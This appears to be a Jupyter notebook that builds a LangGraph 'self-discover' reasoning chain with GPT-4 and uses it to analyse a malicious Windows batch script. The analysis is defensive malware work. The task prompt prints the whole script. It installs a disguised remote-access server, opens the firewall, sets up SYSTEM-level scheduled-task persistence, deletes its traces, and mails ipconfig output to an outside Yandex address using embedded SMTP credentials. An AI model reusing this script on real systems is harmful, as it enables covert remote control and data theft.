In [None]:
!pip install langchain langchain_openai langchainhub langgraph

In [17]:
import os
os.environ["OPENAI_API_KEY"] = "sk-XXX"

In [18]:
from langchain_openai import ChatOpenAI
model = ChatOpenAI(temperature=0, model="gpt-4-turbo-preview")
from langchain import hub
from langchain_core.prompts import PromptTemplate

In [19]:
select_prompt = hub.pull("hwchase17/self-discovery-select")
select_prompt.pretty_print()

Select several reasoning modules that are crucial to utilize in order to solve the given task:

All reasoning module descriptions:
[33;1m[1;3m{reasoning_modules}[0m

Task: [33;1m[1;3m{task_description}[0m

Select several modules are crucial for solving the task above:



In [20]:
adapt_prompt = hub.pull("hwchase17/self-discovery-adapt")
adapt_prompt.pretty_print()


Rephrase and specify each reasoning module so that it better helps solving the task:

SELECTED module descriptions:
[33;1m[1;3m{selected_modules}[0m

Task: [33;1m[1;3m{task_description}[0m

Adapt each reasoning module description to better solve the task:



In [22]:
structured_prompt = hub.pull("hwchase17/self-discovery-structure")
structured_prompt.pretty_print()

Operationalize the reasoning modules into a step-by-step reasoning plan in JSON format:

Here's an example:

Example task:

If you follow these instructions, do you return to the starting point? Always face forward. Take 1 step backward. Take 9 steps left. Take 2 steps backward. Take 6 steps forward. Take 4 steps forward. Take 4 steps backward. Take 3 steps right.

Example reasoning structure:

{
    "Position after instruction 1":
    "Position after instruction 2":
    "Position after instruction n":
    "Is final position the same as starting position":
}

Adapted module description:
[33;1m[1;3m{adapted_modules}[0m

Task: [33;1m[1;3m{task_description}[0m

Implement a reasoning structure for solvers to follow step-by-step and arrive at correct answer.

Note: do NOT actually arrive at a conclusion in this pass. Your job is to generate a PLAN so that in the future you can fill it out and arrive at the correct conclusion for tasks like this


In [24]:
reasoning_prompt = hub.pull("hwchase17/self-discovery-reasoning")
reasoning_prompt.pretty_print()

Follow the step-by-step reasoning plan in JSON to correctly solve the task. Fill in the values following the keys by reasoning specifically about the task given. Do not simply rephrase the keys.
    
Reasoning Structure:
[33;1m[1;3m{reasoning_structure}[0m

Task: [33;1m[1;3m{task_description}[0m


In [28]:
from typing import TypedDict, Optional

class SelfDiscoverState(TypedDict):
    reasoning_modules: str
    task_description: str
    selected_modules: Optional[str]
    adapted_modules: Optional[str]
    reasoning_structure: Optional[str]
    answer: Optional[str]

In [37]:
from langchain.schema.output_parser import StrOutputParser

def select(inputs):
    select_chain = select_prompt | model | StrOutputParser()
    return {"selected_modules": select_chain.invoke(inputs)}

def adapt(inputs):
    adapt_chain = adapt_prompt | model | StrOutputParser()
    return {"adapted_modules": adapt_chain.invoke(inputs)}

def structure(inputs):
    structure_chain = structured_prompt | model | StrOutputParser()
    return {"reasoning_structure": structure_chain.invoke(inputs)}

def reason(inputs):
    reasoning_chain = reasoning_prompt | model | StrOutputParser()
    return {"answer": reasoning_chain.invoke(inputs)}

In [38]:
from langgraph.graph import StateGraph, END
from typing import TypedDict, Optional

graph = StateGraph(SelfDiscoverState)
graph.add_node("select", select)
graph.add_node("adapt", adapt)
graph.add_node("structure", structure)
graph.add_node("reason", reason)
graph.add_edge("select", "adapt")
graph.add_edge("adapt", "structure")
graph.add_edge("structure", "reason")
graph.add_edge("reason", END)
graph.set_entry_point("select")
app = graph.compile()

In [39]:
reasoning_modules = [
    "1. How could I devise an experiment to help solve that problem?",
    "2. Make a list of ideas for solving this problem, and apply them one by one to the problem to see if any progress can be made.",
    # "3. How could I measure progress on this problem?",
    "4. How can I simplify the problem so that it is easier to solve?",
    "5. What are the key assumptions underlying this problem?",
    "6. What are the potential risks and drawbacks of each solution?",
    "7. What are the alternative perspectives or viewpoints on this problem?",
    "8. What are the long-term implications of this problem and its solutions?",
    "9. How can I break down this problem into smaller, more manageable parts?",
    "10. Critical Thinking: This style involves analyzing the problem from different perspectives, questioning assumptions, and evaluating the evidence or information available. It focuses on logical reasoning, evidence-based decision-making, and identifying potential biases or flaws in thinking.",
    "11. Try creative thinking, generate innovative and out-of-the-box ideas to solve the problem. Explore unconventional solutions, thinking beyond traditional boundaries, and encouraging imagination and originality.",
    # "12. Seek input and collaboration from others to solve the problem. Emphasize teamwork, open communication, and leveraging the diverse perspectives and expertise of a group to come up with effective solutions.",
    "13. Use systems thinking: Consider the problem as part of a larger system and understanding the interconnectedness of various elements. Focuses on identifying the underlying causes, feedback loops, and interdependencies that influence the problem, and developing holistic solutions that address the system as a whole.",
    "14. Use Risk Analysis: Evaluate potential risks, uncertainties, and tradeoffs associated with different solutions or approaches to a problem. Emphasize assessing the potential consequences and likelihood of success or failure, and making informed decisions based on a balanced analysis of risks and benefits.",
    # "15. Use Reflective Thinking: Step back from the problem, take the time for introspection and self-reflection. Examine personal biases, assumptions, and mental models that may influence problem-solving, and being open to learning from past experiences to improve future approaches.",
    "16. What is the core issue or problem that needs to be addressed?",
    "17. What are the underlying causes or factors contributing to the problem?",
    "18. Are there any potential solutions or strategies that have been tried before? If yes, what were the outcomes and lessons learned?",
    "19. What are the potential obstacles or challenges that might arise in solving this problem?",
    "20. Are there any relevant data or information that can provide insights into the problem? If yes, what data sources are available, and how can they be analyzed?",
    "21. Are there any stakeholders or individuals who are directly affected by the problem? What are their perspectives and needs?",
    "22. What resources (financial, human, technological, etc.) are needed to tackle the problem effectively?",
    "23. How can progress or success in solving the problem be measured or evaluated?",
    "24. What indicators or metrics can be used?",
    "25. Is the problem a technical or practical one that requires a specific expertise or skill set? Or is it more of a conceptual or theoretical problem?",
    "26. Does the problem involve a physical constraint, such as limited resources, infrastructure, or space?",
    "27. Is the problem related to human behavior, such as a social, cultural, or psychological issue?",
    "28. Does the problem involve decision-making or planning, where choices need to be made under uncertainty or with competing objectives?",
    "29. Is the problem an analytical one that requires data analysis, modeling, or optimization techniques?",
    "30. Is the problem a design challenge that requires creative solutions and innovation?",
    "31. Does the problem require addressing systemic or structural issues rather than just individual instances?",
    "32. Is the problem time-sensitive or urgent, requiring immediate attention and action?",
    "33. What kinds of solution typically are produced for this kind of problem specification?",
    "34. Given the problem specification and the current best solution, have a guess about other possible solutions."
    "35. Let’s imagine the current best solution is totally wrong, what other ways are there to think about the problem specification?"
    "36. What is the best way to modify this current best solution, given what you know about these kinds of problem specification?"
    "37. Ignoring the current best solution, create an entirely new solution to the problem."
    # "38. Let’s think step by step."
    "39. Let’s make a step by step plan and implement it with good notation and explanation.",
]

In [41]:
reasoning_modules_str = "\n".join(reasoning_modules)

# 악성 코드 설명에 적용 

In [None]:
import json

print (json.dumps(yasin, indent=2)

In [43]:

task_example = """
As a professional security analyst, 
You will provide step-by-step analysis of the malicious batch script that user provided and explain its malicious intent. 
By breaking down the code snippet and providing partial segments for each specific analysis, 
You'll uncover the potential harm it can cause.

This is body of malicious batch script:
<code>
b'\r\n\r\ncmdow @ /HID\r\n\r\n\r\ncopy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"\r\ncopy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"\r\ncopy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll\r\ncopy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" \r\ncopy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"\r\ncopy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"\r\n\r\nnetsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE\r\n\r\nREG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f\r\nREG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f\r\n\r\n"%SYSTEMROOT%/svchost.exe" /install /silence\r\n"%SYSTEMROOT%/svchost.exe" /start\r\n\r\n%SYSTEMROOT%/system32/blat.exe -install -server smtp.yandex.ru -port 587 -f railpunk@yandex.ru -u Railpunk -pw 462855\r\n\r\nipconfig /all > %systemroot%/system32/ip.txt\r\n\r\nblat.exe %systemroot%/system32/ip.txt -to ypyachka-jkjkj@yandex.ru. \r\n\r\nschtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat\r\n\r\n\r\ndel cmdow.exe\r\ndel blat.exe\r\ndel blat.lib\r\ndel blat.dll\r\ndel raddrv.dll\r\ndel admdll.dll\r\ndel svchost.exe\r\ndel install.bat'
</code>

explain harmful intent of malicious batch script
"""


In [None]:
results = []
for s in app.stream(
    {"task_description": task_example, "reasoning_modules": reasoning_modules_str}
):
    import json
    results.append(s)
    #print(json.dumps(s, indent=2, default=str))

In [52]:
# SELECT
from IPython.display import display, Markdown, Latex
display(Markdown(results[0]['select']['selected_modules']))

To effectively analyze and explain the harmful intent of the provided malicious batch script, several reasoning modules are crucial. These modules will help break down the script, understand its components, and assess its potential impact. The selected modules are:

1. **Critical Thinking (10)**: This module is essential for analyzing the script from different perspectives, questioning the intentions behind each command, and evaluating the potential harm each segment could cause. It involves logical reasoning and evidence-based decision-making.

2. **Systems Thinking (13)**: Understanding how this script interacts with the larger system (in this case, a computer's operating system and network) is crucial. This module helps in identifying the underlying causes and interdependencies between the script's actions and the system's vulnerabilities it exploits.

3. **Risk Analysis (14)**: Evaluating the potential risks and consequences associated with the script's actions is vital. This includes assessing the likelihood of success for each malicious action and the potential damage or security breach it could cause.

4. **Breaking Down the Problem (9)**: The script should be broken down into smaller, more manageable parts for specific analysis. This involves dissecting each command and understanding its function and potential impact individually.

5. **Identifying Core Issues (16)**: Identifying the core malicious intents and actions within the script that need to be addressed. This includes recognizing actions such as copying malicious files, modifying system settings, and executing unauthorized commands.

6. **Understanding Technical Details (25)**: Given that the task involves analyzing a batch script, a technical understanding of batch scripting, system commands, and their implications is necessary. This includes knowledge of system directories, executable files, and network commands.

7. **Analyzing Potential Obstacles (19)**: Considering potential obstacles in analyzing the script, such as obfuscated code or commands that may not have immediate apparent effects.

8. **Data Analysis (29)**: Analyzing the data flow within the script, such as the creation of files, gathering of system information, and the unauthorized sending of this information to external parties.

9. **Step-by-Step Plan (39)**: Creating a step-by-step plan to analyze each segment of the script, explaining its function, and uncovering its malicious intent. This involves methodically going through the script, providing analysis for each command, and summarizing the potential harm.

By utilizing these reasoning modules, a comprehensive analysis of the malicious batch script can be conducted, revealing its harmful intent and potential impact on systems it targets.

In [54]:
# IMPLEMENT
from IPython.display import display, Markdown, Latex
display(Markdown(results[1]['adapt']['adapted_modules']))

To effectively dissect and elucidate the malevolent objectives of the provided malicious batch script, it is imperative to employ a suite of refined reasoning modules. These modules are tailored to meticulously analyze the script's components, comprehend its mechanics, and gauge its potential ramifications. The refined modules for this task are as follows:

1. **Enhanced Critical Analysis (10)**: This module is pivotal for a deep dive into the script's architecture, scrutinizing the purpose behind each command, and gauging the potential threats each segment may unleash. It leverages logical scrutiny and evidence-backed conclusions to dissect the script's intent.

2. **Advanced Systems Interaction Understanding (13)**: This module is key to comprehending how the script manipulates and interacts with broader system components, such as the operating system and network infrastructure. It aids in pinpointing the script's exploitation of system vulnerabilities through a thorough examination of cause-and-effect relationships and system interdependencies.

3. **Comprehensive Risk Evaluation (14)**: This module is essential for a detailed assessment of the risks and repercussions emanating from the script's execution. It involves a thorough analysis of the probability of each malicious action's success and the extent of damage or security compromise it could instigate.

4. **Segmented Problem Decomposition (9)**: This module advocates for breaking down the script into smaller, more digestible segments for targeted analysis. It entails a command-by-command dissection to understand each command's functionality and its potential threat landscape individually.

5. **Malicious Intent Identification (16)**: This module focuses on pinpointing the script's primary malevolent objectives and actions that warrant immediate attention. It involves recognizing actions such as unauthorized file duplication, system configuration alterations, and execution of unsanctioned commands.

6. **Technical Detail Mastery (25)**: Given the task's nature, a profound technical grasp of batch scripting, system command functionalities, and their implications is indispensable. This encompasses an understanding of system directories, executable files, and network-related commands.

7. **Obstacle Analysis (19)**: This module considers potential hurdles in the script analysis, including code obfuscation or commands with delayed or hidden effects, facilitating a more thorough examination.

8. **Data Flow Examination (29)**: This module involves a meticulous analysis of the script's data manipulation processes, such as file creation, system information harvesting, and unauthorized data transmission to external entities.

9. **Structured Analytical Methodology (39)**: This module outlines a systematic approach to dissect each script segment, elucidate its functionality, and unveil its malevolent purposes. It involves a stepwise traversal of the script, offering detailed command analysis and summarizing the potential threats posed.

By leveraging these refined reasoning modules, a comprehensive and detailed analysis of the malicious batch script can be achieved, uncovering its detrimental intentions and the potential hazards it poses to targeted systems.

In [57]:
# IMPLEMENT
from IPython.display import display, Markdown, Latex
display(Markdown(results[2]['structure']['reasoning_structure']))

```json
{
  "Analysis Plan": [
    {
      "Step": 1,
      "Module": "Enhanced Critical Analysis",
      "Action": "Identify and list all commands in the script.",
      "Purpose": "To understand the structure and components of the script."
    },
    {
      "Step": 2,
      "Module": "Segmented Problem Decomposition",
      "Action": "Break down the script into segments based on functionality.",
      "Purpose": "To simplify the analysis by focusing on smaller parts."
    },
    {
      "Step": 3,
      "Module": "Technical Detail Mastery",
      "Action": "Research each command's functionality and potential uses.",
      "Purpose": "To gain a deep understanding of what each script segment does."
    },
    {
      "Step": 4,
      "Module": "Advanced Systems Interaction Understanding",
      "Action": "Analyze how the script interacts with system components.",
      "Purpose": "To identify how the script exploits system vulnerabilities."
    },
    {
      "Step": 5,
      "Module": "Malicious Intent Identification",
      "Action": "Identify actions within the script that have malicious intent.",
      "Purpose": "To pinpoint the primary malevolent objectives of the script."
    },
    {
      "Step": 6,
      "Module": "Comprehensive Risk Evaluation",
      "Action": "Assess the risks associated with each identified malicious action.",
      "Purpose": "To evaluate the potential damage or security compromise."
    },
    {
      "Step": 7,
      "Module": "Obstacle Analysis",
      "Action": "Identify potential hurdles in analyzing the script.",
      "Purpose": "To anticipate and address challenges such as code obfuscation."
    },
    {
      "Step": 8,
      "Module": "Data Flow Examination",
      "Action": "Analyze the script's data manipulation processes.",
      "Purpose": "To understand unauthorized data transmission or file manipulation."
    },
    {
      "Step": 9,
      "Module": "Structured Analytical Methodology",
      "Action": "Summarize the findings from each step and conclude the analysis.",
      "Purpose": "To compile a comprehensive report on the script's harmful intent."
    }
  ]
}
```

In [60]:
# APPLY ONTO SPECIFIC TASK INSTANCE
from IPython.display import display, Markdown, Latex
display(Markdown(results[3]['reason']['answer']))

Based on the provided malicious batch script, let's follow the reasoning structure to analyze its components and uncover its harmful intent.

### Step 1: Identify and list all commands in the script.

- `cmdow @ /HID`
- `copy /y`
- `netsh firewall add allowedprogram`
- `REG ADD`
- `"%SYSTEMROOT%/svchost.exe" /install /silence`
- `"%SYSTEMROOT%/svchost.exe" /start`
- `%SYSTEMROOT%/system32/blat.exe -install`
- `ipconfig /all > %systemroot%/system32/ip.txt`
- `blat.exe %systemroot%/system32/ip.txt -to`
- `schtasks /create`
- `del`

### Step 2: Break down the script into segments based on functionality.

1. **Hiding the Command Window**: `cmdow @ /HID`
2. **Copying Files**: Multiple `copy /y` commands to copy executables and libraries to system directories.
3. **Firewall Configuration**: `netsh firewall add allowedprogram`
4. **Registry Modifications**: Multiple `REG ADD` commands to modify system settings.
5. **Executing Malicious Software**: Commands to install and start a malicious `svchost.exe`.
6. **Email Configuration and Data Exfiltration**: Using `blat.exe` for email setup and sending system information.
7. **Scheduling Tasks**: `schtasks /create` to persistently execute tasks.
8. **Cleanup**: Multiple `del` commands to remove traces of the tools used.

### Step 3: Research each command's functionality and potential uses.

- `cmdow @ /HID`: Hides the command window to avoid detection.
- `copy /y`: Copies files, potentially malicious, to system directories to maintain persistence.
- `netsh firewall add allowedprogram`: Modifies the firewall to allow the malicious `svchost.exe` through.
- `REG ADD`: Modifies registry settings to disable security notifications and change service display names to hide malicious activities.
- `"%SYSTEMROOT%/svchost.exe"`: Executes a malicious copy of `svchost.exe`, masquerading as a legitimate system process.
- `blat.exe`: Command-line email tool used here to send system information to an attacker.
- `ipconfig /all > %systemroot%/system32/ip.txt`: Dumps system IP configuration for exfiltration.
- `schtasks /create`: Creates scheduled tasks for repeated execution of malicious activities.
- `del`: Deletes files to cover tracks.

### Step 4: Analyze how the script interacts with system components.

The script interacts with system components by:
- Hiding its execution window to avoid user detection.
- Copying malicious files into system directories to ensure they're executed from trusted locations.
- Modifying firewall and registry settings to bypass security measures and hide its presence.
- Executing a malicious version of `svchost.exe` to perform unauthorized activities under the guise of a legitimate process.
- Using scheduled tasks for persistence, ensuring the malicious activities continue even after reboot.

### Step 5: Identify actions within the script that have malicious intent.

- Hiding the command window.
- Copying and executing malicious files.
- Modifying firewall and registry settings to weaken security.
- Exfiltrating system information via email.
- Creating persistent scheduled tasks for ongoing exploitation.

### Step 6: Assess the risks associated with each identified malicious action.

- **Hiding Execution**: Avoids detection, allowing the script to operate unnoticed.
- **Copying and Executing Malicious Files**: Can lead to unauthorized control, data theft, or further malware infection.
- **Modifying Security Settings**: Weakens the system's defenses, making it more vulnerable to attacks.
- **Data Exfiltration**: Compromises privacy and could lead to targeted phishing or further attacks.
- **Persistent Tasks**: Ensures the malware remains active, causing continuous harm.

### Step 7: Identify potential hurdles in analyzing the script.

- Code obfuscation techniques like renaming malicious files to mimic legitimate ones.
- The use of legitimate tools (e.g., `blat.exe`) for malicious purposes, complicating intent assessment.
- The script's ability to delete itself and other tools used, erasing evidence of its presence.

### Step 8: Analyze the script's data manipulation processes.

- Collects system IP configuration data.
- Configures an email client for unauthorized use.
- Sends collected data to an attacker's email, leading to unauthorized data access.

### Step 9: Summarize the findings from each step and conclude the analysis.

The malicious batch script is designed to operate stealthily by hiding its window, copying malicious files into system directories, and modifying system settings to avoid detection and weaken security. It installs a malicious version of `svchost.exe` to perform unauthorized activities and uses `blat.exe` to exfiltrate system information to an attacker. The script sets up persistent tasks for ongoing exploitation and attempts to cover its tracks by deleting the tools used. The primary harmful intents are unauthorized system control, data theft, and ensuring persistence to facilitate continuous exploitation.